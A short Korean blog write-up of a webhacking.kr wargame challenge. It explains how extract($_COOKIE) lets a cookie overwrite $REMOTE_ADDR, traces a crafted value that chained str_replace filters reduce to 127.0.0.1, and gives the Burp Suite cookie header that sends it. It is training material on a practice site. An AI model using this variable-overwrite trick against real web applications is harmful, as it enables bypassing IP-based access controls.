728x90
PHP 코드 해석해서 적절한 값을 서버에 보내야한다
이미 좋은 풀이들이 많이 있다
$_SERVER변수에 이미 $REMOTE_ADDR에 해당하는 값이 존재하지만 extract($_COOKIE)가 나중에 실행되기 때문에 $REMOTE_ADDR을 재정의 할 수 있다
이를 이용해 BURP SUITE나 EditThisCookie를 사용해서 쿠키값에 REMOTE_ADDR=112277...00...00...1 을 설정하면 된다
$ip = str_replace("..",".",$ip); --> 결과값: 112277..00..00..1
$ip = str_replace("12","",$ip); --> 결과값: 1277..00..00..1
$ip = str_replace("7.","",$ip); --> 결과값: 127.00..00..1
$ip = str_replace("0.","",$ip); --> 결과값: 127.0.0.1
str_replace 함수를 한번 실행할 때마다 문자열의 앞에서부터 끝까지 훑으면서 해당하는 문자를 변환한다고 생각하면된다.(변환한 결과를 또 처음부터 훑으면서 변환하는게 아님)
BURP SUITE의 쿠키 값을 다음과 같이 설정했다
Cookie: PHPSESSID=자신의 세션 ID; REMOTE_ADDR=112277...00...00...1
728x90
'webhacking.kr' 카테고리의 다른 글
| webhacking 26(URL Encoding) (0) | 2022.12.18 |
|---|---|
| webhacking 25(LFI) (0) | 2022.12.17 |
| webhacking 23(XSS) (0) | 2022.12.17 |
| webhacking 22(Blind SQL Injection) (0) | 2022.12.17 |
| webhacking 21(Blind SQL Injection) (0) | 2022.12.16 |